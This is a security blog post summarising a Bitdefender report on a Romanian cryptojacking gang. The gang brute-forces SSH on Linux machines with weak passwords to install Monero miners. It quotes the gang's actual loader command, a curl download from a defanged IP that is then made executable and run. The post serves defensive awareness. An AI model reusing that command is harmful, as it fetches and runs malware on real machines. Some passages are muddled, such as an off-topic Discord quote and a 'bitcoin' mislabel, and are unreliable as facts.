Heimdal Security Blog

Romanian Cryptojacking Gang Targets Linux-machines with Weak Passwords

A new malware campaign is now in plain sight. Now the authors behind are represented by a Romanian cryptojacking gang that uses the “Diicot brute”, a SSH brute force without a precedent. As a Bitdefender report states, they target Linux machines related to weak passwords. Their goal? Monero mining malware deployment.

How Does This Romanian Cryptojacking Gang Operate?

Bitdefender analysts studied the operating methods of this new Romanian Cryptojacking Gang. The Diicot brute force is possible because hackers lead a massive campaign that targets Linux-based machines with weak passwords.

Thus, they, as Threatpost described:

Discord is increasingly popular among threat actors because of this functionality, as it involuntarily provides support for malware distribution (use of its CDN), C2 (webhooks) or creating communities centered around buying and selling malware source code and services (e.g. DDoS).


The threat actors initially used “curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua && chmod 777 .93joshua && ./.93joshua && uname -a” payload which is still online, but now they are using mexalz.us.

Why Brute Force Still Works?

The main reason for the success of the Romanian cryptojacking gang is represented by the users. Users mainly opt for passwords that are not so secure, therefore they are easy prey in the hands of threat actors.

Another feature of the Diicot Brute force attack implied the capability of the tool to filter honeypots, as per threat actors’ declarations.

The cybersecurity analysts tracked the Romanian cryptojacking Gang back in May. Then, they discovered the cryptojacking campaign based on the “.93joshua” loader.

What Is Cryptojacking?

Cryptojacking stands for a type of cyberattack in which a hacker uses the processing power of a target to illegally mine bitcoin on the hacker’s behalf. Individual customers, large institutions, and even industrial control systems can all be targets of cryptojacking.

Researchers said that they’ve connected the group to at least two distributed-denial-of-service (DDoS) botnets: a variant of the Linux-based DDoS DemonBot botnet called “chernobyl” and a Perl IRC bot.
